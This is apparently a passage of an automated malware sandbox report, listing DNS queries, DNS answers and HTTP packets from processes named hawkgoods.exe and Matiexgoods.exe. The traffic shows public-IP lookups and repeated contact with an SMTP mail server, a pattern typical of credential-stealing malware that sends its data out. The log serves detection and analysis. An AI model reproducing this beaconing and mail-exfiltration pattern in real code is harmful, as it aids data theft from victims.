                                                                                                  Feb 2, 2021 08:52:25.612889051 CET192.168.2.78.8.8.80x52d5Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:27.152910948 CET192.168.2.78.8.8.80xc1d8Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:28.490356922 CET192.168.2.78.8.8.80xc3b0Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:30.280812979 CET192.168.2.78.8.8.80x9914Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:32.047787905 CET192.168.2.78.8.8.80x276Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:33.987025976 CET192.168.2.78.8.8.80xd60aStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:36.163332939 CET192.168.2.78.8.8.80xb80cStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:37.289861917 CET192.168.2.78.8.8.80xcfe2Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:38.025207043 CET192.168.2.78.8.8.80x220eStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:40.204969883 CET192.168.2.78.8.8.80x91f5Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:40.299511909 CET192.168.2.78.8.8.80xfe1eStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:40.632177114 CET192.168.2.78.8.8.80xfc0eStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:42.364404917 CET192.168.2.78.8.8.80x368eStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:43.485554934 CET192.168.2.78.8.8.80xe0c2Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:44.979003906 CET192.168.2.78.8.8.80xbda6Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:47.347949982 CET192.168.2.78.8.8.80x1787Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:47.588212013 CET192.168.2.78.8.8.80x3404Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:50.374495983 CET192.168.2.78.8.8.80x3390Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:50.658818007 CET192.168.2.78.8.8.80x9a1aStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:53.261665106 CET192.168.2.78.8.8.80x7125Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:56.275100946 CET192.168.2.78.8.8.80xca4Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:59.256263018 CET192.168.2.78.8.8.80xb67fStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:59.423389912 CET192.168.2.78.8.8.80xe5c5Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:00.292697906 CET192.168.2.78.8.8.80x1a9cStandard query (0)69.170.12.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:01.004070044 CET192.168.2.78.8.8.80x3e9Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:02.156910896 CET192.168.2.78.8.8.80x747fStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:05.881093979 CET192.168.2.78.8.8.80x7f71Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:09.224340916 CET192.168.2.78.8.8.80x3367Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:18.055473089 CET192.168.2.78.8.8.80x249aStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:20.778110027 CET192.168.2.78.8.8.80x89c8Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:24.139029980 CET192.168.2.78.8.8.80x2a46Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.415201902 CET192.168.2.78.8.8.80x1132Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.516926050 CET192.168.2.78.8.8.80x667aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:27.549843073 CET192.168.2.78.8.8.80x43b4Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:35.453262091 CET192.168.2.78.8.8.80xba64Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:35.593250036 CET192.168.2.78.8.8.80xbb55Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:38.249537945 CET192.168.2.78.8.8.80x74bcStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:42.031311989 CET192.168.2.78.8.8.80x3d6aStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:45.081511021 CET192.168.2.78.8.8.80x68c3Standard query (0)freegeoip.appA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:45.116350889 CET192.168.2.78.8.8.80x5a1fStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:12.793908119 CET192.168.2.78.8.8.80xcb32Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:15.887363911 CET192.168.2.78.8.8.80xe537Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:19.049554110 CET192.168.2.78.8.8.80x224fStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:22.277606964 CET192.168.2.78.8.8.80xd7eStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:23.821609020 CET192.168.2.78.8.8.80xaef0Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:33.298855066 CET192.168.2.78.8.8.80xa8a1Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:36.197577953 CET192.168.2.78.8.8.80x92d2Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:36.201062918 CET192.168.2.78.8.8.80x2b45Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:38.931622028 CET192.168.2.78.8.8.80x874fStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:40.716998100 CET192.168.2.78.8.8.80xc8e5Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:41.961437941 CET192.168.2.78.8.8.80x53c9Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:43.813313961 CET192.168.2.78.8.8.80xca13Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:48.922760010 CET192.168.2.78.8.8.80xc966Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:51.820154905 CET192.168.2.78.8.8.80xba1aStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:51.831574917 CET192.168.2.78.8.8.80xecd6Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:54.559792995 CET192.168.2.78.8.8.80x5da3Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:54.580755949 CET192.168.2.78.8.8.80xee93Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:57.268471956 CET192.168.2.78.8.8.80x756bStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:57.419401884 CET192.168.2.78.8.8.80xaa2bStandard query (0)smtp.privateemail.comA (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:55:11.386878967 CET192.168.2.78.8.8.80x1733Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Feb 2, 2021 08:51:53.438116074 CET8.8.8.8192.168.2.70xf445Name error (3)69.170.12.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                                  Feb 2, 2021 08:51:53.960005045 CET8.8.8.8192.168.2.70x6da6No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:51:53.960005045 CET8.8.8.8192.168.2.70x6da6No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.487238884 CET8.8.8.8192.168.2.70x6b02No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.487238884 CET8.8.8.8192.168.2.70x6b02No error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.487238884 CET8.8.8.8192.168.2.70x6b02No error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.487238884 CET8.8.8.8192.168.2.70x6b02No error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.487238884 CET8.8.8.8192.168.2.70x6b02No error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.487238884 CET8.8.8.8192.168.2.70x6b02No error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.566323042 CET8.8.8.8192.168.2.70xc21cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.566323042 CET8.8.8.8192.168.2.70xc21cNo error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.566323042 CET8.8.8.8192.168.2.70xc21cNo error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.566323042 CET8.8.8.8192.168.2.70xc21cNo error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.566323042 CET8.8.8.8192.168.2.70xc21cNo error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:04.566323042 CET8.8.8.8192.168.2.70xc21cNo error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:13.041534901 CET8.8.8.8192.168.2.70x872aNo error (0)freegeoip.app104.21.19.200A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:13.041534901 CET8.8.8.8192.168.2.70x872aNo error (0)freegeoip.app172.67.188.154A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:22.335807085 CET8.8.8.8192.168.2.70x849cNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:23.400106907 CET8.8.8.8192.168.2.70xb3beNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:24.643059969 CET8.8.8.8192.168.2.70x9e74No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:25.671786070 CET8.8.8.8192.168.2.70x52d5No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:27.212202072 CET8.8.8.8192.168.2.70xc1d8No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:28.546897888 CET8.8.8.8192.168.2.70xc3b0No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:30.337150097 CET8.8.8.8192.168.2.70x9914No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:32.104201078 CET8.8.8.8192.168.2.70x276No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:34.043262005 CET8.8.8.8192.168.2.70xd60aNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:36.223865032 CET8.8.8.8192.168.2.70xb80cNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:37.348948956 CET8.8.8.8192.168.2.70xcfe2No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:38.086824894 CET8.8.8.8192.168.2.70x220eNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:40.252991915 CET8.8.8.8192.168.2.70x91f5No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:40.356125116 CET8.8.8.8192.168.2.70xfe1eNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:40.688971043 CET8.8.8.8192.168.2.70xfc0eNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:42.421161890 CET8.8.8.8192.168.2.70x368eNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:43.541801929 CET8.8.8.8192.168.2.70xe0c2No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:45.028855085 CET8.8.8.8192.168.2.70xbda6No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:47.405642033 CET8.8.8.8192.168.2.70x1787No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:47.647037029 CET8.8.8.8192.168.2.70x3404No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:50.431301117 CET8.8.8.8192.168.2.70x3390No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:50.706617117 CET8.8.8.8192.168.2.70x9a1aNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:53.313534021 CET8.8.8.8192.168.2.70x7125No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:56.331607103 CET8.8.8.8192.168.2.70xca4No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:59.312505007 CET8.8.8.8192.168.2.70xb67fNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:52:59.482912064 CET8.8.8.8192.168.2.70xe5c5No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:00.353419065 CET8.8.8.8192.168.2.70x1a9cName error (3)69.170.12.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:01.060314894 CET8.8.8.8192.168.2.70x3e9No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:01.060314894 CET8.8.8.8192.168.2.70x3e9No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:02.204837084 CET8.8.8.8192.168.2.70x747fNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:05.928864956 CET8.8.8.8192.168.2.70x7f71No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:09.281547070 CET8.8.8.8192.168.2.70x3367No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:18.103461981 CET8.8.8.8192.168.2.70x249aNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:20.837517023 CET8.8.8.8192.168.2.70x89c8No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:24.195363045 CET8.8.8.8192.168.2.70x2a46No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET8.8.8.8192.168.2.70x1132No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET8.8.8.8192.168.2.70x1132No error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET8.8.8.8192.168.2.70x1132No error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET8.8.8.8192.168.2.70x1132No error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET8.8.8.8192.168.2.70x1132No error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET8.8.8.8192.168.2.70x1132No error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET8.8.8.8192.168.2.70x667aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET8.8.8.8192.168.2.70x667aNo error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET8.8.8.8192.168.2.70x667aNo error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET8.8.8.8192.168.2.70x667aNo error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET8.8.8.8192.168.2.70x667aNo error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET8.8.8.8192.168.2.70x667aNo error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:27.599453926 CET8.8.8.8192.168.2.70x43b4No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:35.512851000 CET8.8.8.8192.168.2.70xba64No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:35.649574995 CET8.8.8.8192.168.2.70xbb55No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:38.297360897 CET8.8.8.8192.168.2.70x74bcNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:42.090331078 CET8.8.8.8192.168.2.70x3d6aNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:45.140338898 CET8.8.8.8192.168.2.70x68c3No error (0)freegeoip.app104.21.19.200A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:45.140338898 CET8.8.8.8192.168.2.70x68c3No error (0)freegeoip.app172.67.188.154A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:53:45.172378063 CET8.8.8.8192.168.2.70x5a1fNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:12.842149973 CET8.8.8.8192.168.2.70xcb32No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:15.948564053 CET8.8.8.8192.168.2.70xe537No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:19.097718954 CET8.8.8.8192.168.2.70x224fNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:22.327384949 CET8.8.8.8192.168.2.70xd7eNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:23.880672932 CET8.8.8.8192.168.2.70xaef0No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:33.360323906 CET8.8.8.8192.168.2.70xa8a1No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:36.256642103 CET8.8.8.8192.168.2.70x92d2No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:36.260183096 CET8.8.8.8192.168.2.70x2b45No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:38.991988897 CET8.8.8.8192.168.2.70x874fNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:40.767158031 CET8.8.8.8192.168.2.70xc8e5No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:42.011138916 CET8.8.8.8192.168.2.70x53c9No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:43.863847971 CET8.8.8.8192.168.2.70xca13No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:48.980370045 CET8.8.8.8192.168.2.70xc966No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:51.876228094 CET8.8.8.8192.168.2.70xba1aNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:51.879745960 CET8.8.8.8192.168.2.70xecd6No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:54.609613895 CET8.8.8.8192.168.2.70x5da3No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:54.630439997 CET8.8.8.8192.168.2.70xee93No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:57.316422939 CET8.8.8.8192.168.2.70x756bNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:54:57.477765083 CET8.8.8.8192.168.2.70xaa2bNo error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)
                                                                                                  Feb 2, 2021 08:55:11.436451912 CET8.8.8.8192.168.2.70x1733No error (0)smtp.privateemail.com199.193.7.228A (IP address)IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • whatismyipaddress.com
                                                                                                  • checkip.dyndns.org

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.749729104.16.155.3680C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 2, 2021 08:51:54.075356960 CET1007OUTGET / HTTP/1.1
                                                                                                  Host: whatismyipaddress.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Feb 2, 2021 08:51:54.127437115 CET1008INHTTP/1.1 403 Forbidden
                                                                                                  Date: Tue, 02 Feb 2021 07:51:54 GMT
                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                  Content-Length: 16
                                                                                                  Connection: keep-alive
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                  Set-Cookie: __cfduid=de810853b8bb2cf1036f76079d68ccb1c1612252314; expires=Thu, 04-Mar-21 07:51:54 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure
                                                                                                  cf-request-id: 08035311fa00000eb751133000000001
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 61b254632f520eb7-FRA
                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                  Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                                                  Data Ascii: error code: 1020
                                                                                                  Feb 2, 2021 08:51:54.375992060 CET1008INHTTP/1.1 403 Forbidden
                                                                                                  Date: Tue, 02 Feb 2021 07:51:54 GMT
                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                  Content-Length: 16
                                                                                                  Connection: keep-alive
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                  Set-Cookie: __cfduid=de810853b8bb2cf1036f76079d68ccb1c1612252314; expires=Thu, 04-Mar-21 07:51:54 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure
                                                                                                  cf-request-id: 08035311fa00000eb751133000000001
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 61b254632f520eb7-FRA
                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                  Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                                                  Data Ascii: error code: 1020


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.749731131.186.113.7080C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 2, 2021 08:52:04.697185040 CET1039OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Feb 2, 2021 08:52:04.757770061 CET1039INHTTP/1.1 200 OK
                                                                                                  Content-Type: text/html
                                                                                                  Server: DynDNS-CheckIP/1.0.1
                                                                                                  Connection: close
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Content-Length: 103
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  10192.168.2.749788216.146.43.7080C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 2, 2021 08:53:47.596793890 CET5141OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Feb 2, 2021 08:53:47.669477940 CET5141INHTTP/1.1 200 OK
                                                                                                  Content-Type: text/html
                                                                                                  Server: DynDNS-CheckIP/1.0.1
                                                                                                  Connection: close
